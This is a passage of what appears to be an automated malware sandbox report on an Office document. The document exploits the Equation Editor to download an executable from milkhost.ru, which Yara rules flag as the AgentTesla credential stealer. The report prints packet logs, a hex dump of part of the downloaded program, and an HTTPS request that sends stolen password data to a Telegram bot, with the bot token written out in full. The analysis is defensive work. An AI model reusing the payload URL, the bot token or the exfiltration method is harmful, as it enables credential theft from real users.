Oct 14, 2021 10:34:58.617321968 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.617326975 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.617368937 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.617424011 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.617425919 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.617441893 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.617450953 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.617469072 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.617474079 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.617521048 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.617532969 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.617568970 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.617573977 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.617616892 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.617618084 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.617662907 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.617666960 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.617711067 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.617712975 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.617759943 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.617762089 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.617810011 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.617813110 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.617861032 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.617862940 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.617908001 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.617909908 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.617958069 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.617958069 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.618014097 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.618021965 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.618066072 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.618067980 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.618120909 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.618122101 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.618169069 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.618169069 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.618216991 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.618222952 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.618273973 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.618273973 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.618335009 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.618335962 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.618392944 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.618393898 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.618448973 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.618451118 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.618504047 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.618505001 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.618561029 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.618565083 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.618621111 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.618622065 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.618675947 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.618685007 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.618735075 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.618736982 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.618782043 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.618786097 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.618828058 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.618835926 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.618885040 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.618886948 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.618933916 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.618936062 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.618973017 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.618978977 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.619019032 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.620682955 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:35:25.569113970 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:36:56.740518093 CEST	49169	443	192.168.2.22	149.154.167.220
Oct 14, 2021 10:36:56.740551949 CEST	443	49169	149.154.167.220	192.168.2.22
Oct 14, 2021 10:36:56.740614891 CEST	49169	443	192.168.2.22	149.154.167.220
Oct 14, 2021 10:36:56.748472929 CEST	49169	443	192.168.2.22	149.154.167.220
Oct 14, 2021 10:36:56.748501062 CEST	443	49169	149.154.167.220	192.168.2.22
Oct 14, 2021 10:36:56.822449923 CEST	443	49169	149.154.167.220	192.168.2.22
Oct 14, 2021 10:36:56.822618961 CEST	49169	443	192.168.2.22	149.154.167.220
Oct 14, 2021 10:36:56.834418058 CEST	49169	443	192.168.2.22	149.154.167.220
Oct 14, 2021 10:36:56.834455967 CEST	443	49169	149.154.167.220	192.168.2.22
Oct 14, 2021 10:36:56.834785938 CEST	443	49169	149.154.167.220	192.168.2.22
Oct 14, 2021 10:36:57.039196968 CEST	443	49169	149.154.167.220	192.168.2.22
Oct 14, 2021 10:36:57.039335012 CEST	49169	443	192.168.2.22	149.154.167.220
Oct 14, 2021 10:36:57.231034994 CEST	49169	443	192.168.2.22	149.154.167.220
Oct 14, 2021 10:36:57.257198095 CEST	443	49169	149.154.167.220	192.168.2.22
Oct 14, 2021 10:36:57.260186911 CEST	49169	443	192.168.2.22	149.154.167.220
Oct 14, 2021 10:36:57.303142071 CEST	443	49169	149.154.167.220	192.168.2.22
Oct 14, 2021 10:36:57.349036932 CEST	443	49169	149.154.167.220	192.168.2.22
Oct 14, 2021 10:36:57.349225044 CEST	443	49169	149.154.167.220	192.168.2.22
Oct 14, 2021 10:36:57.349349976 CEST	49169	443	192.168.2.22	149.154.167.220
Oct 14, 2021 10:36:57.350853920 CEST	49169	443	192.168.2.22	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 14, 2021 10:34:58.163742065 CEST	52167	53	192.168.2.22	8.8.8.8
Oct 14, 2021 10:34:58.266063929 CEST	53	52167	8.8.8.8	192.168.2.22
Oct 14, 2021 10:36:56.684036970 CEST	50591	53	192.168.2.22	8.8.8.8
Oct 14, 2021 10:36:56.701877117 CEST	53	50591	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Oct 14, 2021 10:34:58.163742065 CEST	192.168.2.22	8.8.8.8	0x3047	Standard query (0)	milkhost.ru	A (IP address)	IN (0x0001)
Oct 14, 2021 10:36:56.684036970 CEST	192.168.2.22	8.8.8.8	0xbaaf	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Oct 14, 2021 10:34:58.266063929 CEST	8.8.8.8	192.168.2.22	0x3047	No error (0)	milkhost.ru		95.216.94.72	A (IP address)	IN (0x0001)
Oct 14, 2021 10:36:56.701877117 CEST	8.8.8.8	192.168.2.22	0xbaaf	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

api.telegram.org

milkhost.ru

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49169	149.154.167.220	443	C:\Users\user\AppData\Roaming\godsawqop.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49167	95.216.94.72	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 10:34:58.328747034 CEST	0	OUT	GET /trasper/goshcj.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: milkhost.ru Connection: Keep-Alive
Oct 14, 2021 10:34:58.368735075 CEST	2	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 14 Oct 2021 08:34:58 GMT Content-Type: application/x-msdownload Content-Length: 486912 Connection: keep-alive Last-Modified: Thu, 14 Oct 2021 01:52:01 GMT Expires: Mon, 13 Dec 2021 08:34:58 GMT Cache-Control: max-age=5184000 Pragma: public Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 17 8c 67 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 56 07 00 00 16 00 00 00 00 00 00 3e 74 07 00 00 20 00 00 00 80 07 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 07 00 00 02 00 00 c9 1f 08 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e4 73 07 00 57 00 00 00 00 80 07 00 d0 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 07 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 54 07 00 00 20 00 00 00 56 07 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d0 13 00 00 00 80 07 00 00 14 00 00 00 58 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 07 00 00 02 00 00 00 6c 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 74 07 00 00 00 00 00 48 00 00 00 02 00 05 00 e4 a4 06 00 00 cf 00 00 02 00 00 00 5c 00 00 06 04 42 03 00 df 62 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 49 76 61 6e 20 4d 65 64 76 65 64 65 76 00 00 00 32 7e 27 00 00 04 02 28 c0 00 00 06 2a 1e 02 28 a0 00 00 0a 2a 32 7e 35 00 00 04 02 28 09 01 00 06 2a 1e 02 7b a0 00 00 04 2a 22 02 03 7d a0 00 00 04 2a 1e 02 7b a1 00 00 04 2a 22 02 03 7d a1 00 00 04 2a 1e 02 7b a2 00 00 04 2a 22 02 03 7d a2 00 00 04 2a 52 7e 3b 00 00 04 03 28 06 01 00 06 02 7b a3 00 00 04 fe 01 2a 1e 02 7b a4 00 00 04 2a 22 02 03 7d a4 00 00 04 2a 1e 02 7b a5 00 00 04 2a 22 02 03 7d a5 00 00 04 2a 1e 02 7b a6 00 00 04 2a 22 02 03 7d a6 00 00 04 2a 9a 7e 3e 00 00 04 7e 3c 00 00 04 02 28 09 01 00 06 72 4b 48 00 70 7e 3d 00 00 04 02 28 09 01 00 06 28 11 01 00 06 2a 1e 02 7b a7 00 00 04 2a 22 02 03 7d a7 00 00 04 2a 1e 02 7b a8 00 00 04 2a 22 02 03 7d a8 00 00 04 2a 4e 02 28 a0 00 00 0a 7e 3f 00 00 04 02 03 28 fe 00 00 06 2a 1e 02 7b a9 00 00 04 2a 22 02 03 7d a9 00 00 04 2a ea 7e 3e 00 00 04 7e 40 00 00 04 02 28 09 01 00 06 72 4f 48 00 70 7e 42 00 00 04 72 61 48 00 70 7e 41 00 00 04 02 28 14 01 00 06 8c 64 00 00 01 28 17 01 00 06 28 11 01 00 06 2a 3e 02 04 28 4f 00 00 06 02 03 7d aa 00 00 04 2a 3e 02 7b aa 00 00 04 02 7b aa 00 00 04 5a 6c 2a 3e 02 04 28 4f 00 00 06 02 03 7d ab 00 00 04 2a 66 02 7b ab 00 00 04 02 7b ab 00 00 04 5a 6c 23 18 2d 44 54 fb 21 09 40 5a 2a 5a 02 05 28 4f 00 00 06 02 03 7d ac 00 00 04 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELgaV>t @ @sW H.textDT V `.rsrcX@@.relocl@B tH\BbIvan Medvedev2~'((2~5({"}{"}{"}R~;({{"}{"}{"}~>~<(rKHp~=(({"}{"}N(~?({"}~>~@(rOHp~BraHp~A(d((>(O}>{{Zl>(O}f{{Zl#-DT!@Z*Z(O}
Oct 14, 2021 10:34:58.368786097 CEST	3	IN	Data Raw: 02 04 7d ad 00 00 04 2a 3e 02 7b ac 00 00 04 02 7b ad 00 00 04 5a 6c 2a 32 7e 98 00 00 04 02 28 ce 00 00 06 2a 1e 02 28 b5 00 00 0a 2a 06 2a 1e 02 7b c8 00 00 04 2a 1e 02 7b c9 00 00 04 2a 3a 7e 03 00 00 04 02 03 04 28 ab 00 00 06 2a 1e 02 7b ca Data Ascii: }>{{Zl2~(({{:~({{:~(6~({{{{{z(ef 4 ,aiZ}{{{.~(.~v(*
Oct 14, 2021 10:34:58.368824005 CEST	4	IN	Data Raw: 00 04 00 23 00 00 00 00 00 80 64 40 23 00 00 00 00 00 40 4b 40 28 70 00 00 0a 59 28 6f 00 00 0a 28 1c 00 00 06 d0 7c 00 00 04 00 23 00 00 00 00 00 80 42 40 23 00 00 00 00 00 80 42 40 28 79 00 00 0a 58 28 6f 00 00 0a 28 12 00 00 06 d0 7b 00 00 04 Data Ascii: #d@#@K@(pY(o(\|#B@#B@(yX(o({#3@#3@(zX(o(z# W@# W@X(o(y#W@#?@(uY(o(&x#pm@#S@Y(o(w#$@#
Oct 14, 2021 10:34:58.368863106 CEST	6	IN	Data Raw: 93 7b c1 a8 66 40 23 00 00 00 00 00 80 55 40 28 73 00 00 0a 59 28 6f 00 00 0a 28 0c 00 00 06 d0 58 00 00 04 00 23 25 bb ad a1 59 5a 69 40 23 00 00 00 00 00 20 58 40 28 73 00 00 0a 59 28 6f 00 00 0a 28 1c 00 00 06 d0 57 00 00 04 00 23 00 00 00 00 Data Ascii: {f@#U@(sY(o(X#%YZi@# X@(sY(o(W# W@# W@X(o(V#@#@(zY(o(U#Bb@#`R@(nX(o(T# X@# X@X(o(S#LH#,@#
Oct 14, 2021 10:34:58.368901014 CEST	7	IN	Data Raw: 59 28 6f 00 00 0a 28 10 00 00 06 d0 36 00 00 04 00 23 5b c4 39 2c 98 48 67 40 23 00 00 00 00 00 40 53 40 28 6e 00 00 0a 58 28 6f 00 00 0a 28 0e 00 00 06 d0 35 00 00 04 00 23 00 00 00 00 00 00 00 40 23 00 00 00 00 00 00 10 40 5a 28 6f 00 00 0a 28 Data Ascii: Y(o(6#[9,Hg@#@S@(nX(o(5#@#@Z(o(4#0s@#Y@(qY(o( 3#m@#`S@(yY(o( 2# @#`]@[(o(1#@g@#`W@(vX(o("0
Oct 14, 2021 10:34:58.368938923 CEST	9	IN	Data Raw: 59 28 6f 00 00 0a 28 16 00 00 06 d0 13 00 00 04 00 23 3d ff 47 11 d1 e7 69 40 23 00 00 00 00 00 60 56 40 28 6e 00 00 0a 59 28 6f 00 00 0a 28 0a 00 00 06 d0 12 00 00 04 00 23 00 00 00 00 00 40 71 40 23 00 00 00 00 00 00 57 40 28 79 00 00 0a 59 28 Data Ascii: Y(o(#=Gi@#`V@(nY(o(#@q@#W@(yY(o(#>+h=@#@(sY(o(#b@#H@(zY(o(#g@#O@Y(o(#6JVWb@#@R@(tY(o(
Oct 14, 2021 10:34:58.368977070 CEST	10	IN	Data Raw: 72 67 00 00 70 28 b1 00 00 06 28 c7 00 00 06 2c 0b 7e 0c 00 00 04 14 28 c0 00 00 06 7e 0d 00 00 04 14 fe 06 03 00 00 06 73 7c 00 00 0a 28 ce 00 00 06 0d 7e 0e 00 00 04 09 00 00 23 00 00 00 00 40 ed ef 40 23 00 00 00 00 20 ed df 40 28 76 00 00 0a Data Ascii: rgp((,~(~s\|(~#@@# @(vY(or7p({[#<MA#@}@[(or7p({[X#"vU@#U@(nY(or7p({[Y(~(*0u:~s\|(
Oct 14, 2021 10:34:58.369024992 CEST	11	IN	Data Raw: f1 ec 40 23 00 00 00 00 a0 06 dd 40 28 73 00 00 0a 58 28 6f 00 00 0a 00 72 37 00 00 70 28 7b 00 00 0a 5b 58 9a 6f 80 00 00 0a 0d 09 06 6f 83 00 00 0a 00 00 23 98 80 ca 84 0f 7c 80 40 23 00 00 00 00 00 00 71 40 28 73 00 00 0a 58 28 6f 00 00 0a 00 Data Ascii: @#@(sX(or7p({[Xoo#\|@#q@(sX(or7p({[#^@#}@(sY(or7p({[X#@#@(yY(or7p({[Y#xP@#P@(xX(or7p({[#YQ@#@(x
Oct 14, 2021 10:34:58.369066954 CEST	13	IN	Data Raw: 00 00 00 00 40 e6 cc 40 28 72 00 00 0a 58 28 6f 00 00 0a 00 72 37 00 00 70 28 7b 00 00 0a 5b 59 5a 00 00 00 72 79 01 00 70 28 7b 00 00 0a 00 72 91 01 00 70 28 7b 00 00 0a 61 69 00 23 00 00 00 00 e0 78 dd 40 23 00 00 00 00 e0 78 dd 40 58 28 6f 00 Data Ascii: @@(rX(or7p({[YZryp({rp({ai#x@#x@X(or7p({[X#@@#`@(vX(or7p({[Yrp({rp({ai#@#t@(qY(or7p({[X#7@#z@Y(or7p({
Oct 14, 2021 10:34:58.369103909 CEST	14	IN	Data Raw: f2 41 23 00 00 00 00 f0 42 e8 40 5b 28 6f 00 00 0a 00 72 37 00 00 70 28 7b 00 00 0a 5b 58 00 23 00 00 20 8b 3e 24 d8 41 23 00 00 00 00 60 cb db 40 5b 28 6f 00 00 0a 00 72 37 00 00 70 28 7b 00 00 0a 5b 59 00 00 23 00 00 00 00 80 0d d2 40 23 00 00 Data Ascii: A#B@[(or7p({[X# >$A#`@[(or7p({[Y#@#@(yX(or7p({[#@#@@(vX(or7p({[X# QA#@[(or7p({[YZ#HS3@# @(tX(or7p({[#;eR
Oct 14, 2021 10:34:58.408457041 CEST	16	IN	Data Raw: 23 00 00 00 00 c0 9f c8 40 59 28 6f 00 00 0a 00 72 37 00 00 70 28 7b 00 00 0a 5b 58 58 13 14 11 14 11 08 8e 69 3f 76 ff ff ff 11 05 6f 8d 00 00 0a 13 13 72 cb 00 00 70 11 11 6f 90 00 00 0a 11 08 11 13 6f 91 00 00 0a 2d 0d 11 13 6f 92 00 00 0a 2d Data Ascii: #@Y(or7p({[XXi?vorpoo-o-+#5@# 5@(vX(or7p({[#Hs&@#&@(xY(or7p({[Xrep({ryp({air7p({[Ys8#A#

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49169	149.154.167.220	443	C:\Users\user\AppData\Roaming\godsawqop.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-14 08:36:57 UTC	0	OUT	POST /bot1923392915:AAHa8aKPuVKh5L9QUsA47Z5cQ-J2e00kH0Y/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8d98f2463ef5aa5 Host: api.telegram.org Content-Length: 1023 Expect: 100-continue Connection: Keep-Alive
2021-10-14 08:36:57 UTC	0	IN	HTTP/1.1 100 Continue
2021-10-14 08:36:57 UTC	0	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 66 32 34 36 33 65 66 35 61 61 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 39 39 31 37 39 37 33 36 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 66 32 34 36 33 65 66 35 61 61 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 41 6c 62 75 73 2f 31 34 31 37 30 30 0a 4f 53 46 75 6c 6c Data Ascii: -----------------------------8d98f2463ef5aa5Content-Disposition: form-data; name="chat_id"1991797369-----------------------------8d98f2463ef5aa5Content-Disposition: form-data; name="caption"New PW Recovered!User Name: user/141700OSFull
2021-10-14 08:36:57 UTC	1	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Thu, 14 Oct 2021 08:36:57 GMT Content-Type: application/json Content-Length: 617 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":261,"from":{"id":1923392915,"is_bot":true,"first_name":"deman","username":"deman007_bot"},"chat":{"id":1991797369,"first_name":"Smith","last_name":"Kelvin","type":"private"},"date":1634200617,"document":{"file_name":"user-141700 2021-10-14 03-06-50.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIBBWFn7CmVA21FS8mBJm7hCL2D0uF0AAKyCAACuulBU-ee8Fkid0p2IQQ","file_unique_id":"AgADsggAArrpQVM","file_size":444},"caption":"New PW Recovered!\n\nUser Name: user/141700\nOSFullName: Microsoft Windows 7 Professional \nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 2252 Parent PID: 596

General

Start time:	10:35:13
Start date:	14/10/2021
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Imagebase:	0x13f870000
File size:	1423704 bytes
MD5 hash:	9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 1500 Parent PID: 596

General

Start time:	10:35:15
Start date:	14/10/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: godsawqop.exe PID: 2692 Parent PID: 1500

General

Start time:	10:35:17
Start date:	14/10/2021
Path:	C:\Users\user\AppData\Roaming\godsawqop.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\godsawqop.exe
Imagebase:	0x340000
File size:	486912 bytes
MD5 hash:	D1BAA9515F4C67A7B561938BBD81BC75
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.461361637.00000000032EA000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000004.00000002.461361637.00000000032EA000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Chronological Activities

Analysis Process: godsawqop.exe PID: 2236 Parent PID: 2692

General

Start time:	10:35:41
Start date:	14/10/2021
Path:	C:\Users\user\AppData\Roaming\godsawqop.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\godsawqop.exe
Imagebase:	0x340000
File size:	486912 bytes
MD5 hash:	D1BAA9515F4C67A7B561938BBD81BC75
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.724051743.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000002.724051743.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.724842747.000000000256A000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.724842747.000000000256A000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.724727774.00000000024E1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.724727774.00000000024E1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.724727774.00000000024E1000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: godsawqop.exe PID: 2692 Parent PID: 1500 godsawqop.exeCOMMON

Executed Functions

Function 004F0048, Relevance: 7.4, APIs: 2, Instructions: 4367nativeCOMMON

Download Yara Rule

APIs

ShipAssert.NTDLL ref: 004F16D5
NtOpenResourceManager.NTDLL ref: 004F1F53

Memory Dump Source

Source File: 00000004.00000002.460095115.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID: AssertManagerOpenResourceShip
String ID:
API String ID: 2311488080-0
Opcode ID: f8d92b3949965a8836f652b04aec0e0abcba33099b6f68abf28d9ba889ac59b8
Instruction ID: 0437fe5aac29b43c36bd24b53697842325b9bc1f548a2f550a2c919e05a5d065
Opcode Fuzzy Hash: f8d92b3949965a8836f652b04aec0e0abcba33099b6f68abf28d9ba889ac59b8
Instruction Fuzzy Hash: B2932770E05618CFC714EF28EE956ADBBB1FB88201F0184E9D448A7761EB346E98CF55

Uniqueness

Uniqueness Score: -1.00%

Function 004F5680, Relevance: 6.1, APIs: 1, Instructions: 4576windowCOMMON

Download Yara Rule

APIs

PolyPatBlt.GDI32 ref: 004F6D22

Memory Dump Source

